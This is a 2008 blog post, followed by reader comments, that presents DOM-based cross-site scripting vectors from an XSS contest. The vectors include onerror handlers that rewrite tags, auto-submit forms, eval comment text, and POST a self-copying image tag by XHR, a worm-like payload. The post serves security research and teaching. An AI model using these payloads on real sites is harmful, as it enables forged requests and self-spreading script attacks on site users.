DOM for hackers
Wednesday, 9 January 2008
It’s amazing the stuff I’ve been finding recently, my browser has crashed more times than windoze. In this article I’ll introduce you to using the DOM for unexpected things and hacking it to your advantage. I’ve learned all this new stuff while hacking a vectors for the slackers XSS contest which is really fun.
Contents of a script tag
You can get the contents of a script tag within DOM like this:-
<script id="x">alert(document.getElementById('x').
childNodes.item(0).nodeValue)</script>
Replacing tags
It’s quite easy to replace one tag with another in ways the browser didn’t expect, check the following example:-
<form><iframe onload="parentNode.innerHTML=(s=parentNode.innerHTML)
.replace(/iframe/g,'input'),value=s" name="content"></iframe>
Posting forms
There are lots of shortcuts for posting forms with dom, here I show how to use a image tag to automatically create a form and post content.
<img src="" onerror="with(appendChild(createElement('form')))
submit(i=createElement('input'),i.name='content',i.value='1',
appendChild(i),action='post.php',method='post')">
Comment hacking
You can also get the contents of comments in DOM like this:-
<!-- test --><img src="" onerror="alert(previousSibling.nodeValue)">
Even evaluate the resulting string:-
<!-- alert('Hello') --><img src="" onerror="eval(previousSibling.nodeValue)">
Entity hacking
You can also do the same with entities 🙂
&Hello<img src="" onerror="alert(previousSibling.nodeValue.replace('&',''))">
and even this:-
&iframe onload=alert(1)><img src="" onerror="innerHTML=previousSibling.nodeValue.replace('&','<')">
Self referencing code
You can get the contents of a attribute and create a self referencing tag that requires no parent:-
<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),
send('content='<img src=%22%22 onerror=%22'+attributes[0].nodeValue+'%22>')">
This example uses a XHR object to perform a post, the XHR portion of this vector was constructed by a lot of cool people on the slackers XSS contest.
Here’s another example that I discovered:-
<img src="" onerror="appendChild(cloneNode(0));alert(innerHTML)">
DOM recursion
Finally it’s also possible to make a tag clone itself onto itself:-
<img src="" onerror="appendChild(cloneNode(1))">
No. 1 — January 9th, 2008 at 12:36 pm
again fantastic. very nice post
No. 2 — January 9th, 2008 at 12:47 pm
it’s brilliant article
No. 3 — January 9th, 2008 at 1:33 pm
Kudos for the article.
No. 4 — January 9th, 2008 at 2:09 pm
Thanks for the kind words, I’m glad you enjoyed the article 🙂
I’ll be publishing more stuff soon, checkout the self referencing image:-
<img src=”” onerror=”appendChild(cloneNode(0));alert(innerHTML)”>
No. 5 — January 12th, 2008 at 3:38 pm
thanks Gareth, really appreciated
No. 6 — January 29th, 2008 at 4:06 pm
Hi. The ‘Contents of a script tag’ doesn’t seem to work for me in IE… should it? Cheers.
No. 7 — January 29th, 2008 at 4:35 pm
@greg
Hi I didn’t test the vectors on IE sorry but maybe try:-
<script id=”x”>alert(document.getElementById(‘x’).
childNodes.item(0).data.nodeValue)</script>
I don’t really use windoze you see.
No. 8 — January 30th, 2008 at 5:32 pm
Thanks for trying, but it didn’t work.
I was looking for a way to ‘extract’ function names from a script loaded via src=url, that worked cross-browsers.
God, my head hurts… Time for a cool beer.
BTW I typed a longer reply before, but got a ‘no comment spam here’ message.